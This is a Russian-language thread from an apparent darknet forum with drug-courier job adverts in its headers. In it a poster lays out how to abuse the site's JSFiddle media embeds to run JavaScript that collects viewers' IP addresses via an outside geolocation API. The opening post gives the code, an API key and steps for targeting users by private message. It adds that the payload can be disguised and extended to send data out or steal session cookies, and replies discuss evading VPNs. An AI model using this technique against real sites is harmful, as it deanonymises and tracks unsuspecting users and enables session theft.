НАЛИЧНЫЕ | ДОСТАВКА | ЧИСТКА 1.5% | КЛАД - MasterBIT
Натур Дом — Работа 1500 за клад | Акция 2+1, 5+1 | Розыгрыш BMW и iPhone17. | Раздача ВЕЙП HHC 40%
Ganesha. Выдаем вейпы под реализацию. Зарабатывай сразу без лишних затрат.
Гостевой просмотр ограничен

Уязвимость на форуме Рутор или собираем айпи юзеров через jsfiddle

Unique Projects

Unique Projects

Местный
Работать только с GARANT
Кардинг
Подтвержденный
Заблокирован
Сообщения
320
Реакции
714
Продажи
3
Кешбек
1.25$
Приветствую. Сегодня мы проведем разбор уязвимости на Rutor.

1) О чем речь.
Добавляя каждое сообщение у нас есть возможность добавить медиафайл со сторонних ресурсов.
Я обнаружил, что в списке доступных к добавлению присутствует сайт JsFiddle, который позволяет исполнять js-код.
Для эксплуатации уязвимости нам понадобится создать сниппет на этом сайте.
Снимок экрана от 2023-05-25 00-05-21.png


2) Реализация.
Сейчас я продемонстрирую код, который позволяет собирать айпи юзеров. Так как многие используют клирнет домены для рутор, это может быть чревато.

Нам понадобится учетка с подтвержденной почтой на этом сервисе -
Пожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытые ссылки.

С которой мы возьмем ключ апи. К примеру мой ключ 1ee456bcebb8456589c0771eec8b4ea0

И создадим шаблон здесь
Пожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытые ссылки.

JavaScript: 
let apiKey = '1ee456bcebb8456589c0771eec8b4ea0';
$.getJSON('https://ipgeolocation.abstractapi.com/v1/?api_key=' + apiKey, function(data) {
  console.log(JSON.stringify(data, null, 2));
});

Добавляем это в раздел javascript в jsfiddle. Данный код относительно безобиден и выведет ваш же собственный айпи в вашем браузере в консоль разработчика. Но его легко дополнить и отсылать на какой-нибудь удаленный сервер и сохранять в бд.

Снимок экрана от 2023-05-24 23-57-54.png



3) Эксплуатация
Пишем письмо в лс. Или паблик пост о какой-нибудь интересной вещи. Добавляем туда ссылку на наш jsfiddle через добавления media. В качестве контента html в jsfiddle может быть что угодно. Красивая картинка , страница и тд.

Те кто просмотрят ваш пост или сообщения будут хакнуты. И получен их айпи. JS-зло)

Снимок экрана от 2023-05-25 00-01-12.png



Можете проверить на себе. Нажимать кнопку для получения ip не обязательно. Ваш браузер сразу делает запрос,когда вы просматриваете этот контент.
Сам js-код естественно можно замаскировать, чтобы это выглядело просто как демонстрация чего-то нужного юзеру.


Вывод:
Надо срочно фиксить. Используя данный метод можно собирать не только айпи адреса, а также кукисы сессий и вообще много чего.
Временно рекомендую отключить добавление медиа со сторонних сайтов.

Кстати работает в том числе в лс, то есть адресно для каждого юзера.
В статье я не стал публиковать отсылку вашего айпи куда-либо, однако это также легко сделать.


PS: если кто захочет поблагодарить за инфу, кошель в профиле. На страже безопасности!
 
Вот это новости, уверен исправят этот момент!
 
Очень познавательно, после этой новости старые доменты форума перестали работать?
 
Раз уязвимость есть, значит, с большой вероятностью ранее была неоднократно использована. Печалька.
 
Пожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытые ссылки.
Ссылка на сам сниппет. Чтобы перейти к консоль разработчика браузера жмем f12 и там ваши айпи и доп данные увидите
 
  • Нравится
Реакции: Gaml
в предложения перетаскивай инфу
 
А какие данные они могут узнать если серфишь через связку впн+тор ?
И просто через впн ?
 
Unique Projects написал(а):
Приветствую. Сегодня мы проведем разбор уязвимости на Rutor.

1) О чем речь.
Добавляя каждое сообщение у нас есть возможность добавить медиафайл со сторонних ресурсов.
Я обнаружил, что в списке доступных к добавлению присутствует сайт JsFiddle, который позволяет исполнять js-код.
Для эксплуатации уязвимости нам понадобится создать сниппет на этом сайте.
Посмотреть вложение 922863

2) Реализация.
Сейчас я продемонстрирую код, который позволяет собирать айпи юзеров. Так как многие используют клирнет домены для рутор, это может быть чревато.

Нам понадобится учетка с подтвержденной почтой на этом сервисе -
Пожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытые ссылки.

С которой мы возьмем ключ апи. К примеру мой ключ 1ee456bcebb8456589c0771eec8b4ea0

И создадим шаблон здесь
Пожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытые ссылки.

JavaScript: 
let apiKey = '1ee456bcebb8456589c0771eec8b4ea0';
$.getJSON('https://ipgeolocation.abstractapi.com/v1/?api_key=' + apiKey, function(data) {
  console.log(JSON.stringify(data, null, 2));
});

Добавляем это в раздел javascript в jsfiddle. Данный код относительно безобиден и выведет ваш же собственный айпи в вашем браузере в консоль разработчика. Но его легко дополнить и отсылать на какой-нибудь удаленный сервер и сохранять в бд.

Посмотреть вложение 922861


3) Эксплуатация
Пишем письмо в лс. Или паблик пост о какой-нибудь интересной вещи. Добавляем туда ссылку на наш jsfiddle через добавления media. В качестве контента html в jsfiddle может быть что угодно. Красивая картинка , страница и тд.

Те кто просмотрят ваш пост или сообщения будут хакнуты. И получен их айпи. JS-зло)

Посмотреть вложение 922865


Можете проверить на себе. Нажимать кнопку для получения ip не обязательно. Ваш браузер сразу делает запрос,когда вы просматриваете этот контент.
Сам js-код естественно можно замаскировать, чтобы это выглядело просто как демонстрация чего-то нужного юзеру.


Вывод:
Надо срочно фиксить. Используя данный метод можно собирать не только айпи адреса, а также кукисы сессий и вообще много чего.
Временно рекомендую отключить добавление медиа со сторонних сайтов.

Кстати работает в том числе в лс, то есть адресно для каждого юзера.
В статье я не стал публиковать отсылку вашего айпи куда-либо, однако это также легко сделать.


PS: если кто захочет поблагодарить за инфу, кошель в профиле. На страже безопасности!
Нажмите, чтобы раскрыть...
Друг , давно конечно известно это, "читать" мог только админ, даже модеры рядом не стояли, инфа полезная, но уже не актуальная
 
Vasya_Don написал(а):
Друг , давно конечно известно это, "читать" мог только админ, даже модеры рядом не стояли, инфа полезная, но уже не актуальная
Нажмите, чтобы раскрыть...
Видимо ты совсем не прочел статью. При чем тут админ, у админа и так доступ ко всему.

Тут речь идет о исполнении js кода кем угодно.
 
Unique Projects написал(а):
Приветствую. Сегодня мы проведем разбор уязвимости на Rutor.

1) О чем речь.
Добавляя каждое сообщение у нас есть возможность добавить медиафайл со сторонних ресурсов.
Я обнаружил, что в списке доступных к добавлению присутствует сайт JsFiddle, который позволяет исполнять js-код.
Для эксплуатации уязвимости нам понадобится создать сниппет на этом сайте.
Посмотреть вложение 922863

2) Реализация.
Сейчас я продемонстрирую код, который позволяет собирать айпи юзеров. Так как многие используют клирнет домены для рутор, это может быть чревато.

Нам понадобится учетка с подтвержденной почтой на этом сервисе -
Пожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытые ссылки.

С которой мы возьмем ключ апи. К примеру мой ключ 1ee456bcebb8456589c0771eec8b4ea0

И создадим шаблон здесь
Пожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытые ссылки.

JavaScript: 
let apiKey = '1ee456bcebb8456589c0771eec8b4ea0';
$.getJSON('https://ipgeolocation.abstractapi.com/v1/?api_key=' + apiKey, function(data) {
  console.log(JSON.stringify(data, null, 2));
});

Добавляем это в раздел javascript в jsfiddle. Данный код относительно безобиден и выведет ваш же собственный айпи в вашем браузере в консоль разработчика. Но его легко дополнить и отсылать на какой-нибудь удаленный сервер и сохранять в бд.

Посмотреть вложение 922861


3) Эксплуатация
Пишем письмо в лс. Или паблик пост о какой-нибудь интересной вещи. Добавляем туда ссылку на наш jsfiddle через добавления media. В качестве контента html в jsfiddle может быть что угодно. Красивая картинка , страница и тд.

Те кто просмотрят ваш пост или сообщения будут хакнуты. И получен их айпи. JS-зло)

Посмотреть вложение 922865


Можете проверить на себе. Нажимать кнопку для получения ip не обязательно. Ваш браузер сразу делает запрос,когда вы просматриваете этот контент.
Сам js-код естественно можно замаскировать, чтобы это выглядело просто как демонстрация чего-то нужного юзеру.


Вывод:
Надо срочно фиксить. Используя данный метод можно собирать не только айпи адреса, а также кукисы сессий и вообще много чего.
Временно рекомендую отключить добавление медиа со сторонних сайтов.

Кстати работает в том числе в лс, то есть адресно для каждого юзера.
В статье я не стал публиковать отсылку вашего айпи куда-либо, однако это также легко сделать.


PS: если кто захочет поблагодарить за инфу, кошель в профиле. На страже безопасности!
Нажмите, чтобы раскрыть...
Левые собирает же, толк с них провайдер зарубежный, если webrtc отключен то даже через java script в обход vpn не узнать настоящий. Логирование на форуме отключено. В этом и особенность XenForo он использует java acript для удобства, его можно вырубить, точнее это нужно делать, но тогда у этого форума отрубается большинство функций.
 
Twinkle написал(а):
Левые собирает же, толк с них провайдер зарубежный, если webrtc отключен то даже через java script в обход vpn не узнать настоящий. Логирование на форуме отключено.
Нажмите, чтобы раскрыть...
Ахаха, покажи хоть браузер блочащий WebRtc
 
Twinkle написал(а):
Левые собирает же, толк с них провайдер зарубежный, если webrtc отключен то даже через java script в обход vpn не узнать настоящий. Логирование на форуме отключено. В этом и особенность XenForo он использует java acript для удобства, его можно вырубить, точнее это нужно делать, но тогда у этого форума отрубается большинство функций.
Нажмите, чтобы раскрыть...
Написан базовый пример кода. Можно так и эксплоит заюзать сторонний. Это точка входа
 
Unique Projects написал(а):
Видимо ты совсем не прочел статью. При чем тут админ, у админа и так доступ ко всему.

Тут речь идет о исполнении js кода кем угодно.
Нажмите, чтобы раскрыть...
Мне кажется зря ты так подробно расписал порядок действий что бы воспользоваться этой уязвимостью..
 
Надо уведомить Администратора, но этот движок использует java script по умолчанию, java script можно просто отключить и все.
 
  • Нравится
Реакции: Gaml
TOHEP написал(а):
Мне кажется зря ты так подробно расписал порядок действий что бы воспользоваться этой уязвимостью..
Нажмите, чтобы раскрыть...
Пока не заметно, чтобы аудитория могла воспользоваться, судя по комментам) Но кстати если кто-нибудь запилит спам рассылку по лс, будет угар.
 
Unique Projects написал(а):
Приветствую. Сегодня мы проведем разбор уязвимости на Rutor.

1) О чем речь.
Добавляя каждое сообщение у нас есть возможность добавить медиафайл со сторонних ресурсов.
Я обнаружил, что в списке доступных к добавлению присутствует сайт JsFiddle, который позволяет исполнять js-код.
Для эксплуатации уязвимости нам понадобится создать сниппет на этом сайте.
Посмотреть вложение 922863

2) Реализация.
Сейчас я продемонстрирую код, который позволяет собирать айпи юзеров. Так как многие используют клирнет домены для рутор, это может быть чревато.

Нам понадобится учетка с подтвержденной почтой на этом сервисе -
Пожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытые ссылки.

С которой мы возьмем ключ апи. К примеру мой ключ 1ee456bcebb8456589c0771eec8b4ea0

И создадим шаблон здесь
Пожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытые ссылки.

JavaScript: 
let apiKey = '1ee456bcebb8456589c0771eec8b4ea0';
$.getJSON('https://ipgeolocation.abstractapi.com/v1/?api_key=' + apiKey, function(data) {
  console.log(JSON.stringify(data, null, 2));
});

Добавляем это в раздел javascript в jsfiddle. Данный код относительно безобиден и выведет ваш же собственный айпи в вашем браузере в консоль разработчика. Но его легко дополнить и отсылать на какой-нибудь удаленный сервер и сохранять в бд.

Посмотреть вложение 922861


3) Эксплуатация
Пишем письмо в лс. Или паблик пост о какой-нибудь интересной вещи. Добавляем туда ссылку на наш jsfiddle через добавления media. В качестве контента html в jsfiddle может быть что угодно. Красивая картинка , страница и тд.

Те кто просмотрят ваш пост или сообщения будут хакнуты. И получен их айпи. JS-зло)

Посмотреть вложение 922865


Можете проверить на себе. Нажимать кнопку для получения ip не обязательно. Ваш браузер сразу делает запрос,когда вы просматриваете этот контент.
Сам js-код естественно можно замаскировать, чтобы это выглядело просто как демонстрация чего-то нужного юзеру.


Вывод:
Надо срочно фиксить. Используя данный метод можно собирать не только айпи адреса, а также кукисы сессий и вообще много чего.
Временно рекомендую отключить добавление медиа со сторонних сайтов.

Кстати работает в том числе в лс, то есть адресно для каждого юзера.
В статье я не стал публиковать отсылку вашего айпи куда-либо, однако это также легко сделать.


PS: если кто захочет поблагодарить за инфу, кошель в профиле. На страже безопасности!
Нажмите, чтобы раскрыть...
@RUTOR
Сообщение обновлено:

Unique Projects написал(а):
Пока не заметно, чтобы аудитория могла воспользоваться, судя по комментам) Но кстати если кто-нибудь запилит спам рассылку по лс, будет угар.
Нажмите, чтобы раскрыть...
Вот и я об этом, кто то может воспользоваться из корыстных побуждений.
 
Unique Projects написал(а):
Пока не заметно, чтобы аудитория могла воспользоваться, судя по комментам) Но кстати если кто-нибудь запилит спам рассылку по лс, будет угар.
Нажмите, чтобы раскрыть...
Этой дыре уже 12 лет, java script работает из коробки по умолчанию в XenForo, так как этот движок не предназначен для теневых операций, но в России стал популярным.
 
Twinkle написал(а):
Этой дыре уже 12 лет, java script работает из коробки по умолчанию в XenForo, так как этот движок не предназначен для теневых операций, но в России стал популярным.
Нажмите, чтобы раскрыть...
Вовсе нет. Администрация должна убирать косяки в движке, типа бля загрузок стороннего кода через левый сайт лол. Сам js на форуме - это не уязвимость.
Конкретно сейчас надо просто из списка сайтов доступных через медиафайл убрать jsfiddle
 
Войдите или зарегистрируйтесь для ответа.
Назад
Сверху Снизу